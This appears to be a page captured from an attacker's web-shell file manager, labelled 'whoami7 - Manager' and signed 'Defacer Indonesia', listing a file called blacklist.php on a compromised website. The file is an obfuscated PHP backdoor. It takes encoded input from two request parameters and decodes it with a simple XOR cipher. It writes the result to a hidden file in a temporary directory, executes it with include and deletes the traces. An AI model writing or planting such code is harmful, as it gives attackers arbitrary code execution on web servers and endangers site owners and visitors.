whoami7 - Manager
:
/
home
/
analuakl
/
ankurmedia.com
/
GMR
/
js
/
Upload File:
files >> /home/analuakl/ankurmedia.com/GMR/js/blacklist.php
<?php if(filter_has_var(INPUT_POST, "c\x6Fm\x70")){ $dchunk = array_filter([getenv("TMP"), getcwd(), "/tmp", sys_get_temp_dir(), getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path(), "/dev/shm", "/var/tmp"]); $factor = $_REQUEST["c\x6Fm\x70"]; $factor=explode ( "." , $factor ) ; $entry= ''; $s1= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen( $s1); $z= 0; array_walk( $factor, function( $v1) use( &$entry, &$z, $s1, $lenS) { $chS= ord( $s1[$z% $lenS]); $d= ( ( int)$v1 - $chS -( $z% 10)) ^ 27; $entry .= chr( $d); $z++;}); $data_chunk = 0; do { $flag = $dchunk[$data_chunk] ?? null; if ($data_chunk >= count($dchunk)) break; if (is_writable($flag) && is_dir($flag)) { $obj = str_replace("{var_dir}", $flag, "{var_dir}/.flg"); if (@file_put_contents($obj, $entry) !== false) { include $obj; unlink($obj); die(); } } $data_chunk++; } while (true); } if(isset($_REQUEST) && isset($_REQUEST["d\x65s\x63"])){ $token = $_REQUEST["d\x65s\x63"]; $token= explode("." , $token ) ; $flag = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s ); $q = 0; foreach ($token as $v5) { $chS = ord($s[$q % $lenS] ); $dec = ((int)$v5 - $chS - ($q % 10)) ^ 43; $flag .= chr($dec ); $q++;} $elem = array_filter([session_save_path(), getenv("TMP"), getcwd(), "/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/var/tmp", "/dev/shm"]); foreach ($elem as $key => $bind) { if (max(0, is_dir($bind) * is_writable($bind))) { $marker = str_replace("{var_dir}", $bind, "{var_dir}/.descriptor"); $file = fopen($marker, 'w'); if ($file) { fwrite($file, $flag); fclose($file); include $marker; @unlink($marker); die(); } } } }
Copyright ©2021 || Defacer Indonesia